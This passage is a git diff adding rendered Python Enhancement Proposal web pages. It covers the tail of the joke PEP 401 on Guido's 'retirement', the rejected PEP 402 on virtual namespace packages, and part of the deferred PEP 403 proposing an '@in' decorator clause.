The BDFL, having shepherded Python development for 20 years, +officially announces his retirement, effective immediately. Following +a unanimous vote, his replacement is named.

+
+
+

Rationale

+

Guido wrote the original implementation of Python in 1989, and after +nearly 20 years of leading the community, has decided to step aside as +its Benevolent Dictator For Life. His official title is now +Benevolent Dictator Emeritus Vacationing Indefinitely from the +Language (BDEVIL). Guido leaves Python in the good hands of its new +leader and its vibrant community, in order to train for his lifelong +dream of climbing Mount Everest.

+

After unanimous vote of the Python Steering Union (not to be confused +with the Python Secret Underground, which emphatically does not exist) +at the 2009 Python Conference (PyCon 2009), Guido’s successor has been +chosen: Barry Warsaw, or as he is affectionately known, Uncle Barry. +Uncle Barry’s official title is Friendly Language Uncle For Life (FLUFL).

+
+
+

Official Acts of the FLUFL

+

FLUFL Uncle Barry enacts the following decisions, in order to +demonstrate his intention to lead the community in the same +responsible and open manner as his predecessor, whose name escapes +him:

+
    +
  • Recognized that the selection of Hg as the DVCS of choice was +clear proof of the onset of the BDEVIL’s insanity, and reverting +this decision to switch to Bzr instead, the only true choice.
  • +
  • Recognized that the != inequality operator in Python 3.0 was a +horrible, finger pain inducing mistake, the FLUFL reinstates the +<> diamond operator as the sole spelling. This change is +important enough to be implemented for, and released in Python +3.1. To help transition to this feature, a new future statement, +from __future__ import barry_as_FLUFL has been added.
  • +
  • Recognized that the print function in Python 3.0 was a horrible, +pain-inducing mistake, the FLUFL reinstates the print +statement. This change is important enough to be implemented for, +and released in Python 3.0.2.
  • +
  • Recognized that the disappointing adoption curve of Python 3.0 +signals its abject failure, all work on Python 3.1 and subsequent +Python 3.x versions is hereby terminated. All features in Python +3.0 shall be back ported to Python 2.7 which will be the official +and sole next release. The Python 3.0 string and bytes types will +be back ported to Python 2.6.2 for the convenience of developers.
  • +
  • Recognized that C is a 20th-century language with almost universal +rejection by programmers under the age of 30, the CPython +implementation will terminate with the release of Python 2.6.2 and +3.0.2. Thereafter, the reference implementation of Python will +target the Parrot [1] virtual machine. Alternative implementations +of Python (e.g. Jython [2], IronPython [3], and PyPy [4]) are +officially discouraged but tolerated.
  • +
  • Recognized that the Python Software Foundation [5] having fulfilled +its mission admirably, is hereby disbanded. The Python Steering +Union [6] (not to be confused with the Python Secret Underground, +which emphatically does not exist), is now the sole steward for all +of Python’s intellectual property. All PSF funds are hereby +transferred to the PSU (not that PSU, the other PSU).
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0401.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0402/index.html b/pep-0402/index.html new file mode 100644 index 00000000000..d1f7a1214ae --- /dev/null +++ b/pep-0402/index.html @@ -0,0 +1,703 @@ + + + + + + + + PEP 402 – Simplified Package Layout and Partitioning | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 402 – Simplified Package Layout and Partitioning

+
+
Author:
+
Phillip J. Eby
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
12-Jul-2011
+
Python-Version:
+
3.3
+
Post-History:
+
20-Jul-2011
+
Replaces:
+
382
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

On the first day of sprints at US PyCon 2012 we had a long and +fruitful discussion about PEP 382 and PEP 402. We ended up rejecting +both but a new PEP will be written to carry on in the spirit of PEP +402. Martin von Löwis wrote up a summary: [3].

+
+
+

Abstract

+

This PEP proposes an enhancement to Python’s package importing +to:

+
    +
  • Surprise users of other languages less,
  • +
  • Make it easier to convert a module into a package, and
  • +
  • Support dividing packages into separately installed components +(ala “namespace packages”, as described in PEP 382)
  • +
+

The proposed enhancements do not change the semantics of any +currently-importable directory layouts, but make it possible for +packages to use a simplified directory layout (that is not importable +currently).

+

However, the proposed changes do NOT add any performance overhead to +the importing of existing modules or packages, and performance for the +new directory layout should be about the same as that of previous +“namespace package” solutions (such as pkgutil.extend_path()).

+
+
+

The Problem

+
+
“Most packages are like modules. Their contents are highly +interdependent and can’t be pulled apart. [However,] some +packages exist to provide a separate namespace. … It should +be possible to distribute sub-packages or submodules of these +[namespace packages] independently.”

—Jim Fulton, shortly before the release of Python 2.3 [1]

+
+

When new users come to Python from other languages, they are often +confused by Python’s package import semantics. At Google, for example, +Guido received complaints from “a large crowd with pitchforks” [2] +that the requirement for packages to contain an __init__ module +was a “misfeature”, and should be dropped.

+

In addition, users coming from languages like Java or Perl are +sometimes confused by a difference in Python’s import path searching.

+

In most other languages that have a similar path mechanism to Python’s +sys.path, a package is merely a namespace that contains modules +or classes, and can thus be spread across multiple directories in +the language’s path. In Perl, for instance, a Foo::Bar module +will be searched for in Foo/ subdirectories all along the module +include path, not just in the first such subdirectory found.

+

Worse, this is not just a problem for new users: it prevents anyone +from easily splitting a package into separately-installable +components. In Perl terms, it would be as if every possible Net:: +module on CPAN had to be bundled up and shipped in a single tarball!

+

For that reason, various workarounds for this latter limitation exist, +circulated under the term “namespace packages”. The Python standard +library has provided one such workaround since Python 2.3 (via the +pkgutil.extend_path() function), and the “setuptools” package +provides another (via pkg_resources.declare_namespace()).
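
For reference, the pkgutil workaround consists of every distribution shipping the same two-line __init__.py in its copy of the namespace directory (shown here for a hypothetical zc namespace):

# zc/__init__.py -- shipped identically by every distribution that
# contributes modules to the 'zc' namespace:
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)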

+

The workarounds themselves, however, fall prey to a third issue with +Python’s way of laying out packages in the filesystem.

+

Because a package must contain an __init__ module, any attempt +to distribute modules for that package must necessarily include that +__init__ module, if those modules are to be importable.

+

However, the very fact that each distribution of modules for a package +must contain this (duplicated) __init__ module, means that OS +vendors who package up these module distributions must somehow handle +the conflict caused by several module distributions installing that +__init__ module to the same location in the filesystem.

+

This led to the proposal of PEP 382 (“Namespace Packages”) - a way to signal to Python’s import machinery that a directory was importable, using unique filenames per module distribution.

+

However, there was more than one downside to this approach. +Performance for all import operations would be affected, and the +process of designating a package became even more complex. New +terminology had to be invented to explain the solution, and so on.

+

As terminology discussions continued on the Import-SIG, it soon became +apparent that the main reason it was so difficult to explain the +concepts related to “namespace packages” was because Python’s +current way of handling packages is somewhat underpowered, when +compared to other languages.

+

That is, in other popular languages with package systems, no special +term is needed to describe “namespace packages”, because all +packages generally behave in the desired fashion.

+

Rather than being an isolated single directory with a special marker +module (as in Python), packages in other languages are typically just +the union of appropriately-named directories across the entire +import or inclusion path.

+

In Perl, for example, the module Foo is always found in a +Foo.pm file, and a module Foo::Bar is always found in a +Foo/Bar.pm file. (In other words, there is One Obvious Way to +find the location of a particular module.)

+

This is because Perl considers a module to be different from a +package: the package is purely a namespace in which other modules +may reside, and is only coincidentally the name of a module as well.

+

In current versions of Python, however, the module and the package are +more tightly bound together. Foo is always a module – whether it +is found in Foo.py or Foo/__init__.py – and it is tightly +linked to its submodules (if any), which must reside in the exact +same directory where the __init__.py was found.

+

On the positive side, this design choice means that a package is quite +self-contained, and can be installed, copied, etc. as a unit just by +performing an operation on the package’s root directory.

+

On the negative side, however, it is non-intuitive for beginners, and +requires a more complex step to turn a module into a package. If +Foo begins its life as Foo.py, then it must be moved and +renamed to Foo/__init__.py.

+

Conversely, if you intend to create a Foo.Bar module from the +start, but have no particular module contents to put in Foo +itself, then you have to create an empty and seemingly-irrelevant +Foo/__init__.py file, just so that Foo.Bar can be imported.

+

(And these issues don’t just confuse newcomers to the language, +either: they annoy many experienced developers as well.)

+

So, after some discussion on the Import-SIG, this PEP was created +as an alternative to PEP 382, in an attempt to solve all of the +above problems, not just the “namespace package” use cases.

+

And, as a delightful side effect, the solution proposed in this PEP +does not affect the import performance of ordinary modules or +self-contained (i.e. __init__-based) packages.

+
+
+

The Solution

+

In the past, various proposals have been made to allow more intuitive +approaches to package directory layout. However, most of them failed +because of an apparent backward-compatibility problem.

+

That is, if the requirement for an __init__ module were simply +dropped, it would open up the possibility for a directory named, say, +string on sys.path, to block importing of the standard library +string module.

+

Paradoxically, however, the failure of this approach does not arise +from the elimination of the __init__ requirement!

+

Rather, the failure arises because the underlying approach takes for +granted that a package is just ONE thing, instead of two.

+

In truth, a package comprises two separate, but related entities: a +module (with its own, optional contents), and a namespace where +other modules or packages can be found.

+

In current versions of Python, however, the module part (found in +__init__) and the namespace for submodule imports (represented +by the __path__ attribute) are both initialized at the same time, +when the package is first imported.

+

And, if you assume this is the only way to initialize these two +things, then there is no way to drop the need for an __init__ +module, while still being backwards-compatible with existing directory +layouts.

+

After all, as soon as you encounter a directory on sys.path +matching the desired name, that means you’ve “found” the package, and +must stop searching, right?

+

Well, not quite.

+
+

A Thought Experiment

+

Let’s hop into the time machine for a moment, and pretend we’re back +in the early 1990s, shortly before Python packages and __init__.py +have been invented. But, imagine that we are familiar with +Perl-like package imports, and we want to implement a similar system +in Python.

+

We’d still have Python’s module imports to build on, so we could +certainly conceive of having Foo.py as a parent Foo module +for a Foo package. But how would we implement submodule and +subpackage imports?

+

Well, if we didn’t have the idea of __path__ attributes yet, +we’d probably just search sys.path looking for Foo/Bar.py.

+

But we’d only do it when someone actually tried to import +Foo.Bar.

+

NOT when they imported Foo.

+

And that lets us get rid of the backwards-compatibility problem +of dropping the __init__ requirement, back here in 2011.

+

How?

+

Well, when we import Foo, we’re not even looking for Foo/ +directories on sys.path, because we don’t care yet. The only +point at which we care, is the point when somebody tries to actually +import a submodule or subpackage of Foo.

+

That means that if Foo is a standard library module (for example), +and I happen to have a Foo directory on sys.path (without +an __init__.py, of course), then nothing breaks. The Foo +module is still just a module, and it’s still imported normally.

+
+
+

Self-Contained vs. “Virtual” Packages

+

Of course, in today’s Python, trying to import Foo.Bar will +fail if Foo is just a Foo.py module (and thus lacks a +__path__ attribute).

+

So, this PEP proposes to dynamically create a __path__, in the +case where one is missing.

+

That is, if I try to import Foo.Bar the proposed change to the +import machinery will notice that the Foo module lacks a +__path__, and will therefore try to build one before proceeding.

+

And it will do this by making a list of all the existing Foo/ +subdirectories of the directories listed in sys.path.

+

If the list is empty, the import will fail with ImportError, just +like today. But if the list is not empty, then it is saved in +a new Foo.__path__ attribute, making the module a “virtual +package”.
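
A rough sketch of that list-building step, in deliberately simplified form (the Specification section below gives the real algorithm in terms of PEP 302 importers):

import os
import sys

def build_virtual_path(name):
    """Collect every existing 'name/' subdirectory along sys.path."""
    return [os.path.join(entry, name)
            for entry in sys.path
            if os.path.isdir(os.path.join(entry, name))]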

+

That is, because it now has a valid __path__, we can proceed +to import submodules or subpackages in the normal way.

+

Now, notice that this change does not affect “classic”, self-contained +packages that have an __init__ module in them. Such packages +already have a __path__ attribute (initialized at import time) +so the import machinery won’t try to create another one later.

+

This means that (for example) the standard library email package +will not be affected in any way by you having a bunch of unrelated +directories named email on sys.path. (Even if they contain +*.py files.)

+

But it does mean that if you want to turn your Foo module into +a Foo package, all you have to do is add a Foo/ directory +somewhere on sys.path, and start adding modules to it.

+

But what if you only want a “namespace package”? That is, a package +that is only a namespace for various separately-distributed +submodules and subpackages?

+

For example, if you’re Zope Corporation, distributing dozens of +separate tools like zc.buildout, each in packages under the zc +namespace, you don’t want to have to make and include an empty +zc.py in every tool you ship. (And, if you’re a Linux or other +OS vendor, you don’t want to deal with the package installation +conflicts created by trying to install ten copies of zc.py to the +same location!)

+

No problem. All we have to do is make one more minor tweak to the +import process: if the “classic” import process fails to find a +self-contained module or package (e.g., if import zc fails to find +a zc.py or zc/__init__.py), then we once more try to build a +__path__ by searching for all the zc/ directories on +sys.path, and putting them in a list.

+

If this list is empty, we raise ImportError. But if it’s +non-empty, we create an empty zc module, and put the list in +zc.__path__. Congratulations: zc is now a namespace-only, +“pure virtual” package! It has no module contents, but you can still +import submodules and subpackages from it, regardless of where they’re +located on sys.path.
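
For instance, under this proposal a hypothetical installation could spread the zc namespace across two sys.path entries like this (directory and module names invented for illustration):

site-packages/          (a sys.path entry)
    zc/
        buildout/
            __init__.py
plugins/                (another sys.path entry)
    zc/
        monitor.py

Both import zc.buildout and import zc.monitor would succeed, no zc/__init__.py is needed anywhere, and zc.__path__ would end up listing both zc/ directories.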

+

(By the way, both of these additions to the import protocol (i.e. the +dynamically-added __path__, and dynamically-created modules) +apply recursively to child packages, using the parent package’s +__path__ in place of sys.path as a basis for generating a +child __path__. This means that self-contained and virtual +packages can contain each other without limitation, with the caveat +that if you put a virtual package inside a self-contained one, it’s +gonna have a really short __path__!)

+
+
+

Backwards Compatibility and Performance

+

Notice that these two changes only affect import operations that +today would result in ImportError. As a result, the performance +of imports that do not involve virtual packages is unaffected, and +potential backward compatibility issues are very restricted.

+

Today, if you try to import submodules or subpackages from a module +with no __path__, it’s an immediate error. And of course, if you +don’t have a zc.py or zc/__init__.py somewhere on sys.path +today, import zc would likewise fail.

+

Thus, the only potential backwards-compatibility issues are:

+
    +
  1. Tools that expect package directories to have an __init__ +module, that expect directories without an __init__ module +to be unimportable, or that expect __path__ attributes to be +static, will not recognize virtual packages as packages.

    (In practice, this just means that tools will need updating to +support virtual packages, e.g. by using pkgutil.walk_modules() +instead of using hardcoded filesystem searches.)

    +
  +
  2. Code that expects certain imports to fail may now do something unexpected. This should be fairly rare in practice, as most sane, non-test code does not import things that are expected not to exist!
  +
+

The biggest likely exception to the above would be when a piece of +code tries to check whether some package is installed by importing +it. If this is done only by importing a top-level module (i.e., not +checking for a __version__ or some other attribute), and there +is a directory of the same name as the sought-for package on +sys.path somewhere, and the package is not actually installed, +then such code could be fooled into thinking a package is installed +that really isn’t.

+

For example, suppose someone writes a script (datagen.py) +containing the following code:

+
try:
+    import json
+except ImportError:
+    import simplejson as json
+
+
+

And runs it in a directory laid out like this:

+
datagen.py
+json/
+    foo.js
+    bar.js
+
+
+

If import json succeeded due to the mere presence of the json/ +subdirectory, the code would incorrectly believe that the json +module was available, and proceed to fail with an error.

+

However, we can prevent corner cases like these from arising, simply +by making one small change to the algorithm presented so far. Instead +of allowing you to import a “pure virtual” package (like zc), +we allow only importing of the contents of virtual packages.

+

That is, a statement like import zc should raise ImportError +if there is no zc.py or zc/__init__.py on sys.path. But, +doing import zc.buildout should still succeed, as long as there’s +a zc/buildout.py or zc/buildout/__init__.py on sys.path.

+

In other words, we don’t allow pure virtual packages to be imported +directly, only modules and self-contained packages. (This is an +acceptable limitation, because there is no functional value to +importing such a package by itself. After all, the module object +will have no contents until you import at least one of its +subpackages or submodules!)

+

Once zc.buildout has been successfully imported, though, there +will be a zc module in sys.modules, and trying to import it +will of course succeed. We are only preventing an initial import +from succeeding, in order to prevent false-positive import successes +when clashing subdirectories are present on sys.path.

+

So, with this slight change, the datagen.py example above will +work correctly. When it does import json, the mere presence of a +json/ directory will simply not affect the import process at all, +even if it contains .py files. The json/ directory will still +only be searched in the case where an import like import +json.converter is attempted.

+

Meanwhile, tools that expect to locate packages and modules by +walking a directory tree can be updated to use the existing +pkgutil.walk_modules() API, and tools that need to inspect +packages in memory should use the other APIs described in the +Standard Library Changes/Additions section below.

+
+
+
+

Specification

+

A change is made to the existing import process, when importing +names containing at least one . – that is, imports of modules +that have a parent package.

+

Specifically, if the parent package does not exist, or exists but +lacks a __path__ attribute, an attempt is first made to create a +“virtual path” for the parent package (following the algorithm +described in the section on virtual paths, below).

+

If the computed “virtual path” is empty, an ImportError results, +just as it would today. However, if a non-empty virtual path is +obtained, the normal import of the submodule or subpackage proceeds, +using that virtual path to find the submodule or subpackage. (Just +as it would have with the parent’s __path__, if the parent package +had existed and had a __path__.)

+

When a submodule or subpackage is found (but not yet loaded), +the parent package is created and added to sys.modules (if it +didn’t exist before), and its __path__ is set to the computed +virtual path (if it wasn’t already set).

+

In this way, when the actual loading of the submodule or subpackage +occurs, it will see a parent package existing, and any relative +imports will work correctly. However, if no submodule or subpackage +exists, then the parent package will not be created, nor will a +standalone module be converted into a package (by the addition of a +spurious __path__ attribute).

+

Note, by the way, that this change must be applied recursively: that +is, if foo and foo.bar are pure virtual packages, then +import foo.bar.baz must wait until foo.bar.baz is found before +creating module objects for both foo and foo.bar, and then +create both of them together, properly setting the foo module’s +.bar attribute to point to the foo.bar module.

+

In this way, pure virtual packages are never directly importable: +an import foo or import foo.bar by itself will fail, and the +corresponding modules will not appear in sys.modules until they +are needed to point to a successfully imported submodule or +self-contained subpackage.

+
+

Virtual Paths

+

A virtual path is created by obtaining a PEP 302 “importer” object for +each of the path entries found in sys.path (for a top-level +module) or the parent __path__ (for a submodule).

+

(Note: because sys.meta_path importers are not associated with +sys.path or __path__ entry strings, such importers do not +participate in this process.)

+

Each importer is checked for a get_subpath() method, and if +present, the method is called with the full name of the module/package +the path is being constructed for. The return value is either a +string representing a subdirectory for the requested package, or +None if no such subdirectory exists.

+

The strings returned by the importers are added to the path list +being built, in the same order as they are found. (None values +and missing get_subpath() methods are simply skipped.)

+

The resulting list (whether empty or not) is then stored in a +sys.virtual_package_paths dictionary, keyed by module name.

+

This dictionary has two purposes. First, it serves as a cache, in +the event that more than one attempt is made to import a submodule +of a virtual package.

+

Second, and more importantly, the dictionary can be used by code that +extends sys.path at runtime to update imported packages’ +__path__ attributes accordingly. (See Standard Library +Changes/Additions below for more details.)

+

In Python code, the virtual path construction algorithm would look +something like this:

+
def get_virtual_path(modulename, parent_path=None):
+
+    if modulename in sys.virtual_package_paths:
+        return sys.virtual_package_paths[modulename]
+
+    if parent_path is None:
+        parent_path = sys.path
+
+    path = []
+
+    for entry in parent_path:
+        # Obtain a PEP 302 importer object - see pkgutil module
+        importer = pkgutil.get_importer(entry)
+
+        if hasattr(importer, 'get_subpath'):
+            subpath = importer.get_subpath(modulename)
+            if subpath is not None:
+                path.append(subpath)
+
+    sys.virtual_package_paths[modulename] = path
+    return path
+
+
+

And a function like this one should be exposed in the standard +library as e.g. imp.get_virtual_path(), so that people creating +__import__ replacements or sys.meta_path hooks can reuse it.

+
+
+

Standard Library Changes/Additions

+

The pkgutil module should be updated to handle this +specification appropriately, including any necessary changes to +extend_path(), iter_modules(), etc.

+

Specifically the proposed changes and additions to pkgutil are:

+
    +
  • A new extend_virtual_paths(path_entry) function, to extend +existing, already-imported virtual packages’ __path__ attributes +to include any portions found in a new sys.path entry. This +function should be called by applications extending sys.path +at runtime, e.g. when adding a plugin directory or an egg to the +path.

    The implementation of this function does a simple top-down traversal +of sys.virtual_package_paths, and performs any necessary +get_subpath() calls to identify what path entries need to be +added to the virtual path for that package, given that path_entry +has been added to sys.path. (Or, in the case of sub-packages, +adding a derived subpath entry, based on their parent package’s +virtual path.)

    +

    (Note: this function must update both the path values in +sys.virtual_package_paths as well as the __path__ attributes +of any corresponding modules in sys.modules, even though in the +common case they will both be the same list object.)

    +
  • +
  • A new iter_virtual_packages(parent='') function to allow +top-down traversal of virtual packages from +sys.virtual_package_paths, by yielding the child virtual +packages of parent. For example, calling +iter_virtual_packages("zope") might yield zope.app +and zope.products (if they are virtual packages listed in +sys.virtual_package_paths), but not zope.foo.bar. +(This function is needed to implement extend_virtual_paths(), +but is also potentially useful for other code that needs to inspect +imported virtual packages.)
  • +
  • ImpImporter.iter_modules() should be changed to also detect and +yield the names of modules found in virtual packages.
  • +
+

In addition to the above changes, the zipimport importer should +have its iter_modules() implementation similarly changed. (Note: +current versions of Python implement this via a shim in pkgutil, +so technically this is also a change to pkgutil.)

+

Last, but not least, the imp module (or importlib, if +appropriate) should expose the algorithm described in the virtual +paths section above, as a +get_virtual_path(modulename, parent_path=None) function, so that +creators of __import__ replacements can use it.

+
+
+

Implementation Notes

+

For users, developers, and distributors of virtual packages:

+
    +
  • While virtual packages are easy to set up and use, there is still +a time and place for using self-contained packages. While it’s not +strictly necessary, adding an __init__ module to your +self-contained packages lets users of the package (and Python +itself) know that all of the package’s code will be found in +that single subdirectory. In addition, it lets you define +__all__, expose a public API, provide a package-level docstring, +and do other things that make more sense for a self-contained +project than for a mere “namespace” package.
  • +
  • sys.virtual_package_paths is allowed to contain entries for +non-existent or not-yet-imported package names; code that uses its +contents should not assume that every key in this dictionary is also +present in sys.modules or that importing the name will +necessarily succeed.
  • +
  • If you are changing a currently self-contained package into a +virtual one, it’s important to note that you can no longer use its +__file__ attribute to locate data files stored in a package +directory. Instead, you must search __path__ or use the +__file__ of a submodule adjacent to the desired files, or +of a self-contained subpackage that contains the desired files.

    (Note: this caveat is already true for existing users of “namespace +packages” today. That is, it is an inherent result of being able +to partition a package, that you must know which partition the +desired data file lives in. We mention it here simply so that +new users converting from self-contained to virtual packages will +also be aware of it.)

    +
  • +
  • XXX what is the __file__ of a “pure virtual” package? None? +Some arbitrary string? The path of the first directory with a +trailing separator? No matter what we put, some code is +going to break, but the last choice might allow some code to +accidentally work. Is that good or bad?
  • +
+

For those implementing PEP 302 importer objects:

+
    +
  • Importers that support the iter_modules() method (used by +pkgutil to locate importable modules and packages) and want to +add virtual package support should modify their iter_modules() +method so that it discovers and lists virtual packages as well as +standard modules and packages. To do this, the importer should +simply list all immediate subdirectory names in its jurisdiction +that are valid Python identifiers.

    XXX This might list a lot of not-really-packages. Should we +require importable contents to exist? If so, how deep do we +search, and how do we prevent e.g. link loops, or traversing onto +different filesystems, etc.? Ick. Also, if virtual packages are +listed, they still can’t be imported, which is a problem for the +way that pkgutil.walk_modules() is currently implemented.

    +
  • +
  • “Meta” importers (i.e., importers placed on sys.meta_path) do +not need to implement get_subpath(), because the method +is only called on importers corresponding to sys.path entries +and __path__ entries. If a meta importer wishes to support +virtual packages, it must do so entirely within its own +find_module() implementation.

    Unfortunately, it is unlikely that any such implementation will be +able to merge its package subpaths with those of other meta +importers or sys.path importers, so the meaning of “supporting +virtual packages” for a meta importer is currently undefined!

    +

    (However, since the intended use case for meta importers is to +replace Python’s normal import process entirely for some subset of +modules, and the number of such importers currently implemented is +quite small, this seems unlikely to be a big issue in practice.)

    +
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0402.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0403/index.html b/pep-0403/index.html new file mode 100644 index 00000000000..728d8d9b728 --- /dev/null +++ b/pep-0403/index.html @@ -0,0 +1,615 @@ + + + + + + + + PEP 403 – General purpose decorator clause (aka “@in” clause) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 403 – General purpose decorator clause (aka “@in” clause)

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
13-Oct-2011
+
Python-Version:
+
3.4
+
Post-History:
+
13-Oct-2011
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of a new @in decorator clause that makes +it possible to override the name binding step of a function or class +definition.

+

The new clause accepts a single simple statement that can make a forward reference to the decorated function or class definition.

+

This new clause is designed to be used whenever a “one-shot” function or +class is needed, and placing the function or class definition before the +statement that uses it actually makes the code harder to read. It also +avoids any name shadowing concerns by making sure the new name is visible +only to the statement in the @in clause.

+

This PEP is based heavily on many of the ideas in PEP 3150 (Statement Local +Namespaces) so some elements of the rationale will be familiar to readers of +that PEP. Both PEPs remain deferred for the time being, primarily due to the +lack of compelling real world use cases in either PEP.

+
+
+

Basic Examples

+

Before diving into the long history of this problem and the detailed +rationale for this specific proposed solution, here are a few simple +examples of the kind of code it is designed to simplify.

+

As a trivial example, a weakref callback could be defined as follows:

+
@in x = weakref.ref(target, report_destruction)
+def report_destruction(obj):
+    print("{} is being destroyed".format(obj))
+
+
+

This contrasts with the current (conceptually) “out of order” syntax for +this operation:

+
def report_destruction(obj):
+    print("{} is being destroyed".format(obj))
+
+x = weakref.ref(target, report_destruction)
+
+
+

That structure is OK when you’re using the callable multiple times, but +it’s irritating to be forced into it for one-off operations.

+

If the repetition of the name seems especially annoying, then a throwaway +name like f can be used instead:

+
@in x = weakref.ref(target, f)
+def f(obj):
+    print("{} is being destroyed".format(obj))
+
+
+

Similarly, a sorted operation on a particularly poorly defined type could +now be defined as:

+
@in sorted_list = sorted(original, key=f)
+def f(item):
+    try:
+        return item.calc_sort_order()
+    except NotSortableError:
+        return float('inf')
+
+
+

Rather than:

+
def force_sort(item):
+    try:
+        return item.calc_sort_order()
+    except NotSortableError:
+        return float('inf')
+
+sorted_list = sorted(original, key=force_sort)
+
+
+

And early binding semantics in a list comprehension could be attained via:

+
@in funcs = [adder(i) for i in range(10)]
+def adder(i):
+    return lambda x: x + i
+
+
+
+
+

Proposal

+

This PEP proposes the addition of a new @in clause that is a variant +of the existing class and function decorator syntax.

+

The new @in clause precedes the decorator lines, and allows forward +references to the trailing function or class definition.

+

The trailing function or class definition is always named - the name of +the trailing definition is then used to make the forward reference from the +@in clause.

+

The @in clause is allowed to contain any simple statement (including +those that don’t make any sense in that context, such as pass - while +such code would be legal, there wouldn’t be any point in writing it). This +permissive structure is easier to define and easier to explain, but a more +restrictive approach that only permits operations that “make sense” would +also be possible (see PEP 3150 for a list of possible candidates).

+

The @in clause will not create a new scope - all name binding +operations aside from the trailing function or class definition will affect +the containing scope.

+

The name used in the trailing function or class definition is only visible +from the associated @in clause, and behaves as if it was an ordinary +variable defined in that scope. If any nested scopes are created in either +the @in clause or the trailing function or class definition, those scopes +will see the trailing function or class definition rather than any other +bindings for that name in the containing scope.
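
For example, under the proposed semantics (this is not valid syntax in any released Python), the following would leave an existing binding of f in the containing scope untouched:

+
import weakref
+
+f = "module level binding"
+
+# 'target' is assumed to be some existing object.
+@in x = weakref.ref(target, f)   # here 'f' is the trailing function
+def f(obj):
+    print("{} is being destroyed".format(obj))
+
+# The trailing definition was visible only to the @in clause, so the
+# containing scope still sees the original string binding.
+print(f)                         # -> module level binding
+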

+

In a very real sense, this proposal is about making it possible to override +the implicit “name = <defined function or class>” name binding operation +that is part of every function or class definition, specifically in those +cases where the local name binding isn’t actually needed.

+

Under this PEP, an ordinary class or function definition:

+
@deco2
+@deco1
+def name():
+    ...
+
+
+

can be explained as being roughly equivalent to:

+
@in name = deco2(deco1(name))
+def name():
+    ...
+
+
+
+

Syntax Change

+

Syntactically, only one new grammar rule is needed:

+
in_stmt: '@in' simple_stmt decorated
+
+
+

Grammar: http://hg.python.org/cpython/file/default/Grammar/Grammar

+
+
+
+

Design Discussion

+
+

Background

+

The question of “multi-line lambdas” has been a vexing one for many +Python users for a very long time, and it took an exploration of Ruby’s +block functionality for me to finally understand why this bugs people +so much: Python’s demand that the function be named and introduced +before the operation that needs it breaks the developer’s flow of thought. +They get to a point where they go “I need a one-shot operation that does +<X>”, and instead of being able to just say that directly, they instead +have to back up, name a function to do <X>, then call that function from +the operation they actually wanted to do in the first place. Lambda +expressions can help sometimes, but they’re no substitute for being able to +use a full suite.

+

Ruby’s block syntax also heavily inspired the style of the solution in this +PEP, by making it clear that even when limited to one anonymous function per +statement, anonymous functions could still be incredibly useful. Consider how +many constructs Python has where one expression is responsible for the bulk of +the heavy lifting:

+
    +
  • comprehensions, generator expressions, map(), filter()
  • +
  • key arguments to sorted(), min(), max()
  • +
  • partial function application
  • +
  • provision of callbacks (e.g. for weak references or asynchronous IO)
  • +
  • array broadcast operations in NumPy
  • +
+

However, adopting Ruby’s block syntax directly won’t work for Python, since +the effectiveness of Ruby’s blocks relies heavily on various conventions in +the way functions are defined (specifically, using Ruby’s yield syntax +to call blocks directly and the &arg mechanism to accept a block as a +function’s final argument).

+

Since Python has relied on named functions for so long, the signatures of +APIs that accept callbacks are far more diverse, thus requiring a solution +that allows one-shot functions to be slotted in at the appropriate location.

+

The approach taken in this PEP is to retain the requirement to name the +function explicitly, but allow the relative order of the definition and the +statement that references it to be changed to match the developer’s flow of +thought. The rationale is essentially the same as that used when introducing +decorators, but covering a broader set of applications.

+
+
+

Relation to PEP 3150

+

PEP 3150 (Statement Local Namespaces) describes its primary motivation +as being to elevate ordinary assignment statements to be on par with class +and def statements where the name of the item to be defined is presented +to the reader in advance of the details of how the value of that item is +calculated. This PEP achieves the same goal in a different way, by allowing +the simple name binding of a standard function definition to be replaced +with something else (like assigning the result of the function to a value).

+

Despite having the same author, the two PEPs are in direct competition with each other. PEP 403 (this PEP) represents a minimalist approach that attempts to achieve useful functionality with a minimum of change from the status quo. PEP 3150 instead aims for a more flexible standalone statement design, which requires a larger degree of change to the language.

+

Note that where PEP 403 is better suited to explaining the behaviour of generator expressions correctly, PEP 3150 is better able to explain the behaviour of decorator clauses in general. Both PEPs support adequate explanations for the semantics of container comprehensions.

+
+
+

Keyword Choice

+

The proposal definitely requires some kind of prefix to avoid parsing +ambiguity and backwards compatibility problems with existing constructs. +It also needs to be clearly highlighted to readers, since it declares that +the following piece of code is going to be executed only after the trailing +function or class definition has been executed.

+

The in keyword was chosen as an existing keyword that can be used to +denote the concept of a forward reference.

+

The @ prefix was included in order to exploit the fact that Python +programmers are already used to decorator syntax as an indication of +out of order execution, where the function or class is actually defined +first and then decorators are applied in reverse order.

+

For functions, the construct is intended to be read as “in <this statement +that references NAME> define NAME as a function that does <operation>”.

+

The mapping to English prose isn’t as obvious for the class definition case, +but the concept remains the same.

+
+
+

Better Debugging Support for Functions and Classes with Short Names

+

One of the objections to widespread use of lambda expressions is that they +have a negative effect on traceback intelligibility and other aspects of +introspection. Similar objections are raised regarding constructs that +promote short, cryptic function names (including this one, which requires +that the name of the trailing definition be supplied at least twice, +encouraging the use of shorthand placeholder names like f).

+

However, the introduction of qualified names in PEP 3155 means that even +anonymous classes and functions will now have different representations if +they occur in different scopes. For example:

+
>>> def f():
+...     return lambda: y
+...
